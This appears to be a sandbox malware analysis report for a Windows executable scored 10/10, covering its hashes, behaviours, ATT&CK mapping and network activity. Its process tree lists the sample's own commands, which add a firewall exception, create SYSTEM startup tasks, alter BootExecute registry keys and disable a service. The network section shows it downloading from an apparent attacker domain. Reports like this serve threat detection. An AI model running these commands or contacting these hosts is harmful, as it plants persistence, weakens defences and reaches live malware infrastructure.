Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

7

82feaf4427...18.exe

windows7-x64

10

82feaf4427...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    02/08/2024, 04:15 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe

  • Size

    3.0MB

  • MD5

    82feaf4427aff3dbad0a259b45bff63d

  • SHA1

    f1ca08e6a0866b42e3f7ed7c2e1e1d3ad7a5ceac

  • SHA256

    9a5bdddfeddbfaf15804092d2dd4c0f0edf84ca91781a57ef87a24e2e53c0f31

  • SHA512

    a196d170e7e17b7fbb249bb150cdf088e951183a97687786dbd6935039518b06527be69f7d6c79323f373f8a6d68b0a25c572f5f97962fd40b117a14f777e498

  • SSDEEP

    98304:MDHEfh0QVKtQkgC22K2uJ6AOsmKC81PBTcGcqpXmw8VSfVN7G97BmONSciOi2:m8atgujKC81PBIGcZcNN2EciO/

Score
10/10
discoveryevasionexecutionpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Uses Session Manager for persistence 2 TTPs 3 IoCs

    Creates Session Manager registry key to run executable early in system boot.

    persistence
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:2232
    • C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram C:\windows\system\Plugin.exe RPCCC
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      • System Location Discovery: System Language Discovery
      PID:1796
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn balada /tr c:\autoexec.bat /sc onstart /ru system
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2096
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn startt /tr c:\start.bat /sc onstart /ru system
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2992
    • C:\Windows\SysWOW64\sc.exe
      sc delete GbpSv
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2716
    • C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Control\Session manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f
      2⤵
      • Uses Session Manager for persistence
      • System Location Discovery: System Language Discovery
      PID:3052
    • C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SYSTEM\ControlSet002\Control\Session manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f
      2⤵
      • Uses Session Manager for persistence
      • System Location Discovery: System Language Discovery
      PID:2932
    • C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f
      2⤵
      • Uses Session Manager for persistence
      • System Location Discovery: System Language Discovery
      PID:2816
    • C:\Windows\SysWOW64\net.exe
      net start GbpSv
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 start GbpSv
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2300
    • C:\Windows\SysWOW64\net.exe
      net stop GbpSv
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop GbpSv
        3⤵
        • System Location Discovery: System Language Discovery
        PID:916
    • C:\Windows\SysWOW64\sc.exe
      sc stop GbpSv
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2692
    • C:\Windows\SysWOW64\sc.exe
      sc config GbpSv start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:280
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c c:\autoexec.bat
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1996

Network

  • flag-us
    DNS
    sortedemais.info
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    sortedemais.info
    IN A
    Response
  • flag-us
    DNS
    link3d.iespana.es
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    link3d.iespana.es
    IN A
    Response
  • flag-us
    DNS
    worm12.my-webs.org
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    worm12.my-webs.org
    IN A
    Response
    worm12.my-webs.org
    IN A
    199.59.243.226
  • flag-us
    DNS
    worm12.my-webs.org
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    worm12.my-webs.org
    IN A
  • flag-us
    GET
    http://worm12.my-webs.org/Lista/autochkk.gif
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    Remote address:
    199.59.243.226:80
    Request
    GET /Lista/autochkk.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: worm12.my-webs.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    date: Fri, 02 Aug 2024 04:15:14 GMT
    content-type: text/html; charset=utf-8
    content-length: 1078
    x-request-id: a82bb009-c3fe-4998-8620-c0df36e3b59b
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pAwPqm7EPZ291Lrd19suI/6fuH4FFE/wPQfrqTTVat5Nkuqjuz1i6ouA0HyAQX9NrCU7G94xOCyi5+eR91p/5A==
    set-cookie: parking_session=a82bb009-c3fe-4998-8620-c0df36e3b59b; expires=Fri, 02 Aug 2024 04:30:14 GMT; path=/
  • flag-us
    DNS
    lucifreitas.org
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    lucifreitas.org
    IN A
    Response
  • flag-us
    DNS
    lucifreitas.org
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    lucifreitas.org
    IN A
  • flag-us
    DNS
    lucifreitas.org
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    lucifreitas.org
    IN A
  • 199.59.243.226:80
    http://worm12.my-webs.org/Lista/autochkk.gif
    http
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    939 B
     2.4kB
     13
    6

    HTTP Request

    GET http://worm12.my-webs.org/Lista/autochkk.gif

    HTTP Response

    200
  • 8.8.8.8:53
    sortedemais.info
    dns
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    62 B
     141 B
     1
    1

    DNS Request

    sortedemais.info

  • 8.8.8.8:53
    link3d.iespana.es
    dns
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    63 B
     134 B
     1
    1

    DNS Request

    link3d.iespana.es

  • 8.8.8.8:53
    worm12.my-webs.org
    dns
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    128 B
     80 B
     2
    1

    DNS Request

    worm12.my-webs.org

    DNS Request

    worm12.my-webs.org

    DNS Response

    199.59.243.226

  • 8.8.8.8:53
    lucifreitas.org
    dns
    82feaf4427aff3dbad0a259b45bff63d_JaffaCakes118.exe
    183 B
     143 B
     3
    1

    DNS Request

    lucifreitas.org

    DNS Request

    lucifreitas.org

    DNS Request

    lucifreitas.org

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

System Services

2
T1569

Service Execution

2
T1569.002

Persistence

Boot or Logon Autostart Execution

2
T1547

Registry Run Keys / Startup Folder

2
T1547.001

Create or Modify System Process

3
T1543

Windows Service

3
T1543.003

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

2
T1547

Registry Run Keys / Startup Folder

2
T1547.001

Create or Modify System Process

3
T1543

Windows Service

3
T1543.003

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Defense Evasion

Impair Defenses

2
T1562

Disable or Modify System Firewall

1
T1562.004

Modify Registry

2
T1112

Credential Access

Discovery

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

2
T1489

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\autoexec.bat
    Filesize

    6KB

    MD5

    3c4efbf13ceeb379b1a102ca466048cd

    SHA1

    cd038f0fe0747102bf0568a9eafc139fb63b7e8b

    SHA256

    1156730d23bd9460f2b577176b8960df0cffe15a72c7df0b1da6ddb13ce6e995

    SHA512

    68f7085a2f3d24a543b25029fa83cfff1ed05f63a99155cecbb4cdc0b9b26354f4d48b08256c5a5212ce319467b23fa6804e9f8d67a81c4231d444ffe1eac320

    Download Submit

  • memory/2232-2-0x0000000000400000-0x0000000000B64000-memory.dmp

    Filesize

    7.4MB

    Download

  • memory/2232-3-0x0000000000400000-0x0000000000B64000-memory.dmp

    Filesize

    7.4MB

    Download

  • memory/2232-19-0x0000000000400000-0x0000000000B64000-memory.dmp

    Filesize

    7.4MB

    Download

  • memory/2232-20-0x0000000000400000-0x0000000000B64000-memory.dmp

    Filesize

    7.4MB

    Download

  • memory/2232-24-0x0000000000400000-0x0000000000B64000-memory.dmp

    Filesize

    7.4MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.